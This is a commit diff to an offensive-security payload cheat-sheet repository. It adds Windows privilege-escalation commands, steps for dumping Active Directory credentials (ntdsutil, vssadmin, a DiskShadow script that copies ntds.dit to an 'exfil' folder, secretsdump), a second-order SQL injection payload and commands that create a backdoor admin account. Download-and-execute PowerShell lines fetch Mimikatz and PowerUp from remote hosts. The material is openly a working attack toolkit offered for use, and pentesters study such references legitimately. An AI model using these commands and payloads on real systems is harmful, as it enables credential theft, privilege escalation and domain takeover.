mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Windows PrivEsc + SQLi second order + AD DiskShadow
This commit is contained in:
parent
f1cb7ce50e
commit
e261836532
@ -39,6 +39,7 @@ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M met
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
|
||||
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
|
||||
```
|
||||
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
|
||||
|
||||
## Most common paths to AD compromise
|
||||
|
||||
@ -82,36 +83,59 @@ Get-NetGPOGroup
|
||||
|
||||
|
||||
### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
|
||||
```c
|
||||
**Using ndtsutil**
|
||||
```powershell
|
||||
C:\>ntdsutil
|
||||
ntdsutil: activate instance ntds
|
||||
ntdsutil: ifm
|
||||
ifm: create full c:\pentest
|
||||
ifm: quit
|
||||
ntdsutil: quit
|
||||
```
|
||||
|
||||
or
|
||||
|
||||
**Using Vshadow**
|
||||
```powershell
|
||||
vssadmin create shadow /for=C :
|
||||
Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
|
||||
```
|
||||
|
||||
**Using DiskShadow (a Windows signed binary)**
|
||||
```powershell
|
||||
diskshadow.txt contains :
|
||||
set context persistent nowriters
|
||||
add volume c: alias someAlias
|
||||
create
|
||||
expose %someAlias% z:
|
||||
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
|
||||
delete shadows volume %someAlias%
|
||||
reset
|
||||
|
||||
then:
|
||||
diskshadow.exe /s c:\diskshadow.txt
|
||||
dir c:\exfil
|
||||
reg.exe save hklm\system c:\exfil\system.bak
|
||||
```
|
||||
|
||||
**Extract hashes from ntds.dit**
|
||||
then you need to use secretsdump to extract the hashes
|
||||
```c
|
||||
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
|
||||
```
|
||||
|
||||
|
||||
Metasploit module
|
||||
**Alternatives - modules**
|
||||
Metasploit modules
|
||||
```c
|
||||
windows/gather/credentials/domain_hashdump
|
||||
```
|
||||
|
||||
|
||||
PowerSploit module
|
||||
```
|
||||
Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
|
||||
```
|
||||
|
||||
|
||||
|
||||
### Golden Tickets
|
||||
Forge a TGT, require krbtgt key
|
||||
|
||||
@ -267,4 +291,5 @@ net group "Domain Admins" hacker2 /add /domain
|
||||
* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/)
|
||||
* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/)
|
||||
* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/)
|
||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
*[Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments)
|
||||
* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
|
157
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
157
Methodology and Resources/Windows - Privilege Escalation.md
Normal file
@ -0,0 +1,157 @@
|
||||
# Windows - Privilege Escalation
|
||||
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/)
|
||||
|
||||
|
||||
## Windows Version and Configuration
|
||||
```powershell
|
||||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||||
```
|
||||
|
||||
Architecture
|
||||
```powershell
|
||||
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
|
||||
```
|
||||
|
||||
|
||||
List all env variables
|
||||
```powershell
|
||||
set
|
||||
```
|
||||
|
||||
List all drives
|
||||
```powershell
|
||||
wmic logicaldisk get caption || fsutil fsinfo drives
|
||||
```
|
||||
|
||||
## User Enumeration
|
||||
|
||||
Get current username
|
||||
```powershell
|
||||
echo %USERNAME% || whoami
|
||||
```
|
||||
|
||||
List all users
|
||||
```powershell
|
||||
net user
|
||||
whoami /all
|
||||
```
|
||||
|
||||
List logon requirements; useable for bruteforcing
|
||||
```powershell
|
||||
net accounts
|
||||
```
|
||||
|
||||
Get details about a user (i.e. administrator, admin, current user)
|
||||
```powershell
|
||||
net user administrator
|
||||
net user admin
|
||||
net user %USERNAME%
|
||||
```
|
||||
|
||||
List all local groups
|
||||
```powershell
|
||||
net localgroup
|
||||
```
|
||||
|
||||
Get details about a group (i.e. administrators)
|
||||
```powershell
|
||||
net localgroup administrators
|
||||
```
|
||||
|
||||
## Network Enumeration
|
||||
|
||||
List all network interfaces
|
||||
```powershell
|
||||
ipconfig /all
|
||||
```
|
||||
|
||||
List current routing table
|
||||
```powershell
|
||||
route print
|
||||
```
|
||||
|
||||
List the ARP table
|
||||
```powershell
|
||||
arp -A
|
||||
```
|
||||
|
||||
List all current connections
|
||||
```powershell
|
||||
netstat -ano
|
||||
```
|
||||
|
||||
List firware state and current configuration
|
||||
```powershell
|
||||
netsh advfirewall firewall dump
|
||||
```
|
||||
|
||||
List all network shares
|
||||
```powershell
|
||||
net share
|
||||
```
|
||||
|
||||
## Looting for passwords
|
||||
|
||||
Search for file contents
|
||||
```powershell
|
||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||
```
|
||||
|
||||
Search for a file with a certain filename
|
||||
```powershell
|
||||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||
```
|
||||
|
||||
Search the registry for key names
|
||||
```powershell
|
||||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||
```
|
||||
|
||||
Read a value of a certain sub key
|
||||
```powershell
|
||||
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
|
||||
```
|
||||
|
||||
## Processes Enum
|
||||
What processes are running?
|
||||
```powershell
|
||||
tasklist /v
|
||||
```
|
||||
|
||||
Which processes are running as "system"
|
||||
```powershell
|
||||
tasklist /v /fi "username eq system"
|
||||
```
|
||||
|
||||
Do you have powershell magic?
|
||||
```powershell
|
||||
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
|
||||
```
|
||||
|
||||
|
||||
## Uploading / Downloading files
|
||||
a wget using powershell
|
||||
```powershell
|
||||
powershell -Noninteractive -NoProfile -command "wget https://addaxsoft.com/download/wpecs/wget.exe -UseBasicParsing -OutFile %TEMP%\wget.exe"
|
||||
```
|
||||
|
||||
wget using bitsadmin (when powershell is not present)
|
||||
```powershell
|
||||
cmd /c "bitsadmin /transfer myjob /download /priority high https://addaxsoft.com/download/wpecs/wget.exe %TEMP%\wget.exe"
|
||||
```
|
||||
|
||||
now you have wget.exe that can be executed from %TEMP%wget for example I will use it here to download netcat
|
||||
```powershell
|
||||
%TEMP%\wget https://addaxsoft.com/download/wpecs/nc.exe
|
||||
```
|
||||
|
||||
## Spot the weak service using PowerSploit's PowerUP
|
||||
```powershell
|
||||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
@ -1,9 +1,14 @@
|
||||
# Windows - Using credentials
|
||||
Little tip, if you don't have credentials yet :D
|
||||
```
|
||||
```powershell
|
||||
net user hacker hacker /add
|
||||
net localgroup administrators hacker /add
|
||||
```
|
||||
Some info about your user
|
||||
```powershell
|
||||
net user /dom
|
||||
net user /domain
|
||||
```
|
||||
|
||||
|
||||
## Metasploit - SMB
|
||||
|
@ -1,6 +1,6 @@
|
||||
# POSTGRESQL
|
||||
|
||||
## PostgreSQL Comment
|
||||
## PostgreSQL Comments
|
||||
```
|
||||
--
|
||||
/**/
|
||||
|
@ -2,13 +2,19 @@
|
||||
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
|
||||
|
||||
## Summary
|
||||
* [Entry point detection](#)
|
||||
* [DBMS Identification](#)
|
||||
* [SQL injection using SQLmap](#)
|
||||
* [Authentication bypass](#)
|
||||
* [Polyglot injection](#)
|
||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#)
|
||||
* [WAF Bypass](#)
|
||||
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MSSQL%20Injection.md)
|
||||
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/MySQL%20Injection.md)
|
||||
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
|
||||
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
|
||||
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
|
||||
* [Entry point detection](#entry-point-detection)
|
||||
* [DBMS Identification](#dbms-identification)
|
||||
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
|
||||
* [Authentication bypass](#authentication-bypass)
|
||||
* [Polyglot injection](#polyglot-injection-multicontext)
|
||||
* [Second order injection](#second-order-injection)
|
||||
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
|
||||
* [WAF Bypass](#waf-bypass)
|
||||
|
||||
|
||||
## Entry point detection
|
||||
@ -275,6 +281,11 @@ admin") or "1"="1"/*
|
||||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
## Second order injection
|
||||
```sql
|
||||
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
|
||||
```
|
||||
|
||||
## Insert Statement - ON DUPLICATE KEY UPDATE
|
||||
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
|
||||
```sql
|
||||
@ -392,7 +403,7 @@ mysql> mysql> select version();
|
||||
- [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
|
||||
- [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
|
||||
- [The SQL Injection Knowledge base](https://websec.ca/kb/sql_injection)
|
||||
* MSQQL:
|
||||
* MSSQL:
|
||||
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
|
||||
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
|
||||
* ORACLE:
|
||||
|
@ -1,6 +1,6 @@
|
||||
# SQLite Injection
|
||||
|
||||
## SQLite comment
|
||||
## SQLite comments
|
||||
```sql
|
||||
--
|
||||
/**/
|
||||
|
Loading…
Reference in New Issue
Block a user